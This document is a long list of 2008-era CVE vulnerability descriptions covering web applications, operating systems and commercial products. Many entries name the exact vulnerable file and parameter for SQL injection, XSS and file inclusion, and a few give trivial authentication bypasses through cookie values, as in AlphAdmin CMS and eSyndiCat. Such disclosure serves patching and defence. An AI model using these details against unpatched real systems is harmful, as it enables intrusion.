Unspecified vulnerability in a certain ActiveX control in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-3691, CVE-2008-3693, CVE-2008-3694, CVE-2008-3695, and CVE-2008-3696.
Unspecified vulnerability in a certain ActiveX control in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-3692, CVE-2008-3693, CVE-2008-3694, CVE-2008-3695, and CVE-2008-3696.
Unspecified vulnerability in the FTP subsystem in Sun Java System Web Proxy Server 4.0 through 4.0.5 before SP6 allows remote attackers to cause a denial of service (failure to accept connections) via unknown vectors, probably related to exhaustion of file descriptors.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in IDevSpot PhpLinkExchange 1.01 allow remote attackers to inject arbitrary web script or HTML via the catid parameter in a (1) user_add, (2) recip, (3) tellafriend, or (4) contact action, or (5) in a request without an action; or (6) the id parameter in a tellafriend action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in showcategory.php in PozScripts Classified Ads allows remote attackers to execute arbitrary SQL commands via the cid parameter, a different vector than CVE-2008-3673. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Acronis True Image Echo Server 9.x build 8072 on Linux does not properly encrypt backups to an FTP server, which allows remote attackers to obtain sensitive information.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in TikiWiki CMS/Groupware before 2.0 allows attackers to obtain "path and PHP configuration" via unknown vectors.
Multiple unspecified vulnerabilities in TikiWiki CMS/Groupware before 2.0 have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Horde Groupware Webmail before Edition 1.1.1 (final) have unknown impact and attack vectors related to "unescaped output," possibly cross-site scripting (XSS), in the (1) object browser and (2) contact view.
Heap-based buffer overflow in the local IPC component in the EAPOLController plugin for configd (Networking component) in Mac OS X 10.4.11 and 10.5.5 allows local users to execute arbitrary code via unknown vectors.
Apple QuickTime before 7.5.5 does not properly handle (1) MDAT atoms in MP4 video files within QuickTimeH264.qtx, (2) MDAT atoms in mov video files within QuickTimeH264.scalar, and (3) AVC1 atoms in an unknown media type within an unspecified component, which allows remote attackers to execute arbitrary code or cause a denial of service (heap corruption and application crash) via a crafted, H.264 encoded movie file.
Unspecified vulnerability in McAfee Encrypted USB Manager 3.1.0.0, when the Re-use Threshold for passwords is nonzero, allows remote attackers to conduct offline brute force attacks via unknown vectors.
Multiple SQL injection vulnerabilities in admin/login.asp in E. Z. Poll 2 allow remote attackers to execute arbitrary SQL commands via the (1) Username and (2) Password parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Calacode @Mail 5.41 on Linux does not require administrative authentication for build-plesk-upgrade.php, which allows remote attackers to obtain sensitive information by creating and downloading a backup archive of the entire @Mail directory tree.  NOTE: this can be leveraged for remote exploitation of CVE-2008-3395.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in ZoneO-soft freeForum 1.7 allows remote attackers to inject arbitrary web script or HTML via the acuparam parameter to (1) the default URI or (2) index.php, or (3) the PATH_INFO to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Meeting Room Booking System (MRBS) 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the area parameter to (1) day.php, (2) week.php, (3) month.php, (4) search.php, (5) report.php, and (6) help.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in index.php in the Contact module in Chupix CMS 0.1.0, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the mods parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in KAPhotoservice allow remote attackers to inject arbitrary web script or HTML via the (1) filename parameter to search.asp and the (2) page parameter to order.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Nokia Series 40 3rd edition devices allow remote attackers to execute arbitrary code via unknown vectors, probably related to MIDP privilege escalation and persistent MIDlets, aka "ISSUES 3-10." NOTE: as of 20080807, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a company led by a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
Multiple unspecified vulnerabilities in Nokia Series 40 3rd edition FP1, and possibly later devices, allow remote attackers to execute arbitrary code via unknown vectors, probably related to MIDP privilege escalation and persistent MIDlets, aka "ISSUES 11-15." NOTE: as of 20080807, the only disclosure is a vague pre-advisory with no actionable information.  However, because it is from a company led by a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
Multiple unspecified vulnerabilities in Sun Java Platform Micro Edition (aka Java ME, J2ME, or mobile Java), as distributed in Sun Wireless Toolkit 2.5.2, allow remote attackers to execute arbitrary code via unknown vectors.  NOTE: as of 20080807, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a company led by a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in the pthread_mutex_reltimedlock_np API in Sun Solaris 10 and OpenSolaris before snv_90 allows local users to cause a denial of service (system hang or panic) via unknown vectors.
Unspecified vulnerability in the Sun Netra T5220 Server with firmware 7.1.3 allows local users to cause a denial of service (panic) via unknown vectors.
Unspecified vulnerability in ovtopmd in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2008-3536, CVE-2008-3537, and CVE-2008-3544.  NOTE: due to insufficient details from the vendor, it is not clear whether this is the same as CVE-2008-1853.
Unspecified vulnerability in NFS / ONCplus B.11.31_04 and earlier on HP-UX B.11.31 allows remote attackers to cause a denial of service via unknown attack vectors.
Unspecified vulnerability in HP Insight Diagnostics before 7.9.1.2402 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP OpenView Select Identity (HPSI) Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and earlier, HPSI IBM Tivoli Dir Connector 1.02 and earlier, HPSI TOPSecret Connector 2.22.001 and earlier, HPSI RACF Connector 1.12.001 and earlier, HPSI ACF2 Connector 1.02 and earlier, HPSI OpenLDAP Connector 1.02 and earlier, and HPSI BiDir DirX Connector 1.00.003 and earlier, allows local users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Enterprise Discovery 2.0 through 2.52 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors.  NOTE: the initial description of this CVE was inadvertently associated with libxml2, but it should be for HP Enterprise Discovery.
Unspecified vulnerability in ovalarmsrv in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2008-3536.
Unspecified vulnerability in ovalarmsrv in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2008-3537.
Buffer overflow in the jas_stream_printf function in libjasper/base/jas_stream.c in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via vectors related to the mif_hdr_put function and use of vsprintf.
Multiple integer overflows in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via a crafted image file, related to integer multiplication for memory allocation.
Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Image Gallery (Photo Gallery) allow remote attackers to inject arbitrary web script or HTML via the (1) latest parameter to (a) index.php, (b) images.php, (c) suggest_image.php, and (d) image_desc.php; and the (2) msg parameter to index.php, images.php, and suggest_image.php, and (e) index.php, (f) adminhome.php, (g) config.php, (h) changepassword.php, (i) cleanup.php, (j) browsecats.php, and (k) images.php in admin/. NOTE: the image_desc.php/msg vector is covered by CVE-2006-1660.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in mask PHP File Manager (mPFM) before 2.3 has unknown impact and remote attack vectors related to "manipulation of cookies."
Unspecified vulnerability in "a page in the workarea folder" in Ektron CMS400.NET 7.00 through 7.04 and 7.50 through 7.52 has unknown impact and attack vectors.
Buffer overflow in format descriptor parsing in the uvc_parse_format function in drivers/media/video/uvc/uvc_driver.c in uvcvideo in the video4linux (V4L) implementation in the Linux kernel before 2.6.26.1 has unknown impact and attack vectors.
Unspecified vulnerability in Novell iManager before 2.7 SP1 (2.7.1) allows remote attackers to delete Plug-in Studio created Property Book Pages via unknown vectors.
Multiple unspecified vulnerabilities in ImpressCMS 1.0 have unknown impact and attack vectors, related to modules/admin.php and "a few files."
Unspecified vulnerability in the Solaris Platform Information and Control Library daemon (picld) in Sun Solaris 8 through 10, and OpenSolaris builds snv_01 through snv_95, allows local users to cause a denial of service via unknown vectors that prevent operation of utilities such as prtdiag, prtpicl, and prtfru.
Unspecified vulnerability in the Sun Java System Web Server 7.0 plugin in Sun N1 Service Provisioning System (SPS) 5.2 and 6.0 allows remote authenticated SPS users to gain administrative access to the web server via unknown attack vectors.
Calacode @Mail 5.41 on Linux uses weak world-readable permissions for (1) webmail/libs/Atmail/Config.php and (2) webmail/webadmin/.htpasswd, which allows local users to obtain sensitive information by reading these files.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Snark VisualPic 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the pic parameter to the default URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in JamRoom before 3.4.0 have unknown impact and attack vectors.
SQL injection vulnerability in register.php in Steve Bourgeois and Chris Vincent Owl Intranet Knowledgebase 0.95 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in the Newbb Plus (newbb_plus) module 0.93 in RunCMS 1.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) bbPath[path] parameter to votepolls.php and the (2) bbPath[root_theme] parameter to config.php, different vectors than CVE-2006-0659.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
dnsmasq 2.43 allows remote attackers to cause a denial of service (daemon crash) by (1) sending a DHCPINFORM while lacking a DHCP lease, or (2) attempting to renew a nonexistent DHCP lease for an invalid subnet as an "unknown client," a different vulnerability than CVE-2008-3214.
Multiple SQL injection vulnerabilities in search_result.cfm in Jobbex JobSite allow remote attackers to execute arbitrary SQL commands via the (1) jobcountryid and (2) jobstateid parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in PunBB before 1.2.19 allows remote attackers to inject arbitrary SMTP commands via unknown vectors.
Unspecified vulnerability in Links before 2.1, when "only proxies" is enabled, has unknown impact and attack vectors related to providing "URLs to external programs."
Cross-site scripting (XSS) vulnerability in the wiki engine in Trac before 0.10.5 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple PHP remote file inclusion vulnerabilities in CreaCMS 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) cfg[document_uri] parameter to _administration/edition_article/edition_article.php and the (2) cfg[base_uri_admin] parameter to _administration/fonctions/get_liste_langue.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in lemon_includes/FCKeditor/editor/filemanager/browser/browser.php in Lemon CMS 1.10 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the dir parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this might be an issue in FCKeditor.
SQL injection vulnerability in info.php in C. Desseno YouTube Blog (ytb) 0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter, a different vector than CVE-2008-3307.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
AlphAdmin CMS 1.0.5/03 allows remote attackers to bypass authentication and gain administrative access by setting the aa_login cookie value to 1.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
eSyndiCat 1.6 allows remote attackers to bypass authentication and gain administrative access by setting the admin_lng cookie value to 1. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in modules/system/admin.php in XOOPS 2.0.18 1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the fct parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in modules/system/admin.php in XOOPS 2.0.18.1 allows remote attackers to inject arbitrary web script or HTML via the fct parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the PropFilePasswordEncoder utility in the Security component in IBM WebSphere Application Server (WAS) 5.1 before 5.1.1.19 has unknown impact and attack vectors.
Joomla! before 1.5.4 does not configure .htaccess to apply certain security checks that "block common exploits" to SEF URLs, which has unknown impact and remote attack vectors.
Unspecified vulnerability in Joomla! before 1.5.4 has unknown impact and attack vectors related to a "User Redirect Spam fix," possibly an open redirect vulnerability.
The file caching implementation in Joomla! before 1.5.4 allows attackers to access cached pages via unknown attack vectors.
Joomla! before 1.5.4 allows attackers to access administration functionality, which has unknown impact and attack vectors related to a missing "LDAP security fix."
Unspecified vulnerability in phpBB before 3.0.1 has unknown impact and attack vectors related to "urls gone through redirect() being used within login_box()."
Session fixation vulnerability in Drupal 5.x before 5.9 and 6.x before 6.3, when contributed modules "terminate the current request during a login event," allows remote attackers to hijack web sessions via unknown vectors.
The Drupal filter_xss_admin function in 5.x before 5.8 and 6.x before 6.3 does not "prevent use of the object HTML tag in administrator input," which has unknown impact and attack vectors, probably related to an insufficient cross-site scripting (XSS) protection mechanism.
Multiple SQL injection vulnerabilities in Scripteen Free Image Hosting Script 1.2.1 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter to admin/login.php, or the (3) uname or (4) pass parameter to login.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Xomol CMS 1.2 allows remote attackers to inject arbitrary web script or HTML via the current_url parameter in a tellafriend action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Pagefusion 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) acct_fname and (2) acct_lname parameters in an edit action, and the (3) PID, (4) PGID, and (5) rez parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in ReSIProcate before 1.3.4 allow remote attackers to cause a denial of service (stack consumption) via unknown network traffic with a large "bytes-in-memory/bytes-on-wire ratio."
Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Blog (Blogger) allow remote attackers to inject arbitrary web script or HTML via the membername parameter to (1) members.php, (2) comments.php, (3) photos.php, (4) archive.php, or (5) cat.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, allows remote attackers to cause a denial of service via unknown vectors, related to "insufficient validation."
Directory traversal vulnerability in dodosmail.php in DodosMail 2.5 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the dodosmail_header_file parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in jsp/common/system/debug.jsp in IBM Maximo 4.1 and 5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Accept, (2) Accept-Language, (3) UA-CPU, (4) Accept-Encoding, (5) User-Agent, or (6) Cookie HTTP header.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in IBM Data ONTAP 7.1 before 7.1.3, as used by IBM System Storage N series Filer and IBM System Storage N series Gateway, have unknown impact and attack vectors.
Unspecified vulnerability in NWFS.SYS in Novell Client for Windows 4.91 SP4 has unknown impact and attack vectors, possibly related to IOCTL requests that overwrite arbitrary memory.
Multiple integer overflows in Python before 2.5.2 might allow context-dependent attackers to have an unknown impact via vectors related to (1) Include/pymem.h; (2) _csv.c, (3) _struct.c, (4) arraymodule.c, (5) audioop.c, (6) binascii.c, (7) cPickle.c, (8) cStringIO.c, (9) cjkcodecs/multibytecodec.c, (10) datetimemodule.c, (11) md5.c, (12) rgbimgmodule.c, and (13) stropmodule.c in Modules/; (14) bufferobject.c, (15) listobject.c, and (16) obmalloc.c in Objects/; (17) Parser/node.c; and (18) asdl.c, (19) ast.c, (20) bltinmodule.c, and (21) compile.c in Python/, as addressed by "checks for integer overflows, contributed by Google."
The syslog dissector in Wireshark (formerly Ethereal) 1.0.0 allows remote attackers to cause a denial of service (application crash) via unknown vectors, possibly related to an "incomplete SS7 MSU syslog encapsulated packet."
The RTMPT dissector in Wireshark (formerly Ethereal) 0.99.8 through 1.0.0 allows remote attackers to cause a denial of service (crash) via unknown vectors.  NOTE: this might be due to a use-after-free error.
The (1) PANA and (2) KISMET dissectors in Wireshark (formerly Ethereal) 0.99.3 through 1.0.0 allow remote attackers to cause a denial of service (application stop) via unknown vectors.
The GSM SMS dissector in Wireshark (formerly Ethereal) 0.99.2 through 1.0.0 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in OpenCart 0.7.7 allow remote attackers to inject arbitrary web script or HTML via the (1) firstname and (2) search parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Sun Java Runtime Environment (JRE) in JDK and JRE 6 Update 6 and earlier and JDK and JRE 5.0 Update 15 and earlier allows remote attackers to access URLs via unknown vectors involving processing of XML data by an untrusted (1) application or (2) applet, a different vulnerability than CVE-2008-3105.
Unspecified vulnerability in the JAX-WS client and service in Sun Java Runtime Environment (JRE) in JDK and JRE 6 Update 6 and earlier allows remote attackers to access URLs or cause a denial of service via unknown vectors involving "processing of XML data" by a trusted application.
Unspecified vulnerability in Opera before 9.51 on Windows allows attackers to execute arbitrary code via unknown vectors.
arch/x86/kernel/ptrace.c in the Linux kernel before 2.6.25.10 on the x86_64 platform leaks task_struct references into the sys32_ptrace function, which allows local users to cause a denial of service (system crash) or have unspecified other impact via unknown vectors, possibly a use-after-free vulnerability.
Unspecified vulnerability in Simple Machines Forum (SMF) 1.1.x before 1.1.5 and 1.0.x before 1.0.13 has unknown impact and attack vectors, probably cross-site scripting (XSS), related to "use of the html-tag."
Simple Machines Forum (SMF) 1.1.x before 1.1.5 and 1.0.x before 1.0.13, when running in PHP before 4.2.0, does not properly seed the random number generator, which has unknown impact and attack vectors.
Directory traversal vulnerability in inc/class_language.php in MyBB before 1.2.13 has unknown impact and attack vectors related to the $language variable.
Unspecified vulnerability in inc/datahandler/user.php in MyBB before 1.2.13 has unknown impact and attack vectors related to the $user['language'] variable, probably related to SQL injection.
Unspecified vulnerability in RealNetworks RealPlayer Enterprise, RealPlayer 10, and RealPlayer 10.5 before build 6.0.12.1675 has unknown impact and attack vectors, probably related to accessing local files, aka a "Local resource reference vulnerability."
Unspecified vulnerability in the SQL Frontend (mh_omsqlio) extension 1.0.11 and earlier for TYPO3 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the PDF Generator 2 (pdf_generator2) extension 0.5.0 and earlier for TYPO3 has unknown impact and attack vectors related to "Unprotected test functionality."
Incomplete blacklist vulnerability in the KB Unpack (kb_unpack) extension 0.1.0 and earlier for TYPO3 has unknown impact and attack vectors.
Incomplete blacklist vulnerability in the Packman (kb_packman) extension 0.2.1 and earlier for TYPO3 has unknown impact and attack vectors.
Unspecified vulnerability in the Industry Database (aka Branchendatenbank pro_industrydb) extension 1.0.0 and earlier for TYPO3 has unknown impact and attack vectors related to "Insufficient Verification of Data Authenticity."
Unspecified vulnerability in the DAM Frontend (dam_frontend) extension 0.1.0 and earlier for TYPO3 has unknown impact and attack vectors related to "Improper Error Handling."
Unspecified vulnerability in the DAM Frontend (dam_frontend) extension 0.1.0 and earlier for TYPO3 has unknown impact and attack vectors related to "broken access control."
Unspecified vulnerability in the DAM Frontend (dam_frontend) extension 0.1.0 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.
gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability."
Unspecified vulnerability in includes/classes/page.php in j00lean-CMS 1.03 has unknown impact and attack vectors.
Heap-based buffer overflow in the IBM AFP Viewer Plug-in 2.0.7.1 and 3.2.1.1 allows remote attackers to execute arbitrary code via a long SRC property value.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in template2.php in PEGames allow remote attackers to inject arbitrary web script or HTML via the (1) sitetitle, (2) sitenav, (3) sitemain, and (4) sitealt parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the IMAP service in NetWin SurgeMail before 3.9g2 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors related to an "imap command."
SQL injection vulnerability in index.php in WebChamado 1.1 allows remote attackers to execute arbitrary SQL commands via the eml parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in OFF System before 0.19.14 allow remote attackers to have an unknown impact via unspecified vectors related to "parsing of http headers."
Unspecified vulnerability in the Extensible Interface Platform in Web Services in Xerox WorkCentre 7655, 7665, and 7675 allows remote attackers to make configuration changes via unknown vectors.
Cross-site scripting (XSS) vulnerability in WallCity-Server Shoutcast Admin Panel 2.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter to the login interface.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Mozilla Firefox before 2.0.0.15, Thunderbird 2.0.0.14 and earlier, and SeaMonkey before 1.1.10 allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via unknown vectors related to the JavaScript engine.
Multiple unspecified vulnerabilities in Mozilla Firefox before 2.0.0.15, Thunderbird 2.0.0.14 and earlier, and SeaMonkey before 1.1.10 allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via unknown vectors related to the layout engine.
Cross-site scripting (XSS) vulnerability in MainLayout.do in ManageEngine OpUtils 5.0 allows remote attackers to inject arbitrary web script or HTML via the hostName parameter, when viewing an SNMP graph.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the GUI in Symantec Altiris Notification Server Agent 6.x before 6.0 SP3 R8 allows local users to gain privileges via unknown attack vectors.
Buffer overflow in Firefox 3.0 and 2.0.x has unknown impact and attack vectors.  NOTE: due to lack of details as of 20080619, it is not clear whether this is the same issue as CVE-2008-2785.  A CVE identifier has been assigned for tracking purposes.
Multiple cross-site scripting (XSS) vulnerabilities in Horde Groupware, Groupware Webmail Edition, and Kronolith allow remote attackers to inject arbitrary web script or HTML via the timestamp parameter to (1) week.php, (2) workweek.php, and (3) day.php; and (4) the horde parameter in the PATH_INFO to the default URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.asp in DT Centrepiece 4.0 allows remote attackers to inject arbitrary web script or HTML via the searchFor parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in search.asp in DT Centrepiece 4.0 allows remote attackers to execute arbitrary SQL commands via the searchFor parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in vBulletin 3.6.10 and 3.7.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors and an "obscure method." NOTE: the vector is probably in the redirect parameter to the Admin Control Panel (admincp/index.php).
Cross-site scripting (XSS) vulnerability in the embedded web server in Xerox 4110, 4590, and 4595 Copier/Printers allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) 5500 devices 8.0(3)15, 8.0(3)16, 8.1(1)4, and 8.1(1)5, when configured as a clientless SSL VPN endpoint, allows remote attackers to obtain usernames and passwords via unknown vectors, aka Bug ID CSCsq45636.
Multiple unspecified vulnerabilities in the SIP inspection functionality in Cisco PIX and Adaptive Security Appliance (ASA) 5500 devices 7.0 before 7.0(7)16, 7.1 before 7.1(2)71, 7.2 before 7.2(4)7, 8.0 before 8.0(3)20, and 8.1 before 8.1(1)8 allow remote attackers to cause a denial of service (device reload) via unknown vectors, aka Bug IDs CSCsq07867, CSCsq57091, CSCsk60581, and CSCsq39315.
embed.php in Menalto Gallery before 2.2.5 allows remote attackers to obtain the full path via unknown vectors related to "spoofing the remote address."
Unspecified vulnerability in the e1000g driver in Sun Solaris 10 and OpenSolaris before snv_93 allows remote attackers to cause a denial of service (network connectivity loss) via unknown vectors.
Multiple PHP remote file inclusion vulnerabilities in BrowserCRM 5.002.00, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the bcrm_pub_root parameter to (1) kb.php, (2) login.php, (3) index.php, (4) contact_view.php, and (5) contact.php in pub/, different vectors than CVE-2008-2689.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in PHP Image Gallery allows remote attackers to inject arbitrary web script or HTML via the action parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors, a different issue than CVE-2008-2662, CVE-2008-2664, and CVE-2008-2725. NOTE: as of 20080624, there has been inconsistent usage of multiple CVE identifiers related to Ruby. The CVE description should be regarded as authoritative, although it is likely to change.
Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption, a different issue than CVE-2008-2663, CVE-2008-2664, and CVE-2008-2725.  NOTE: as of 20080624, there has been inconsistent usage of multiple CVE identifiers related to Ruby. This CVE description should be regarded as authoritative, although it is likely to change.
Unspecified vulnerability in Adobe Reader and Acrobat 7.0.9 and earlier, and 8.0 through 8.1.2, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors, related to an "input validation issue in a JavaScript method."
The WordClient interface in Alt-N Technologies MDaemon 9.6.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted HTTP POST request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors. NOTE: the previous information was obtained from the Oracle October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue involves an authentication bypass by establishing a TNS connection and impersonating a user session via a crafted authentication message during proxy authentication mode.
Unspecified vulnerability in the Oracle OLAP component in Oracle Database 10.1.0.5 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2615, CVE-2008-2616, CVE-2008-2617, CVE-2008-2618, CVE-2008-2620, and CVE-2008-2621.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2615, CVE-2008-2616, CVE-2008-2617, CVE-2008-2618, CVE-2008-2620, and CVE-2008-2622.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2615, CVE-2008-2616, CVE-2008-2617, CVE-2008-2618, CVE-2008-2621, and CVE-2008-2622.
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Application Server 1.0.2.2, 9.0.4.3, and 10.1.2.2, and E-Business Suite 11.5.10.2, allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2615, CVE-2008-2616, CVE-2008-2617, CVE-2008-2620, CVE-2008-2621, and CVE-2008-2622.
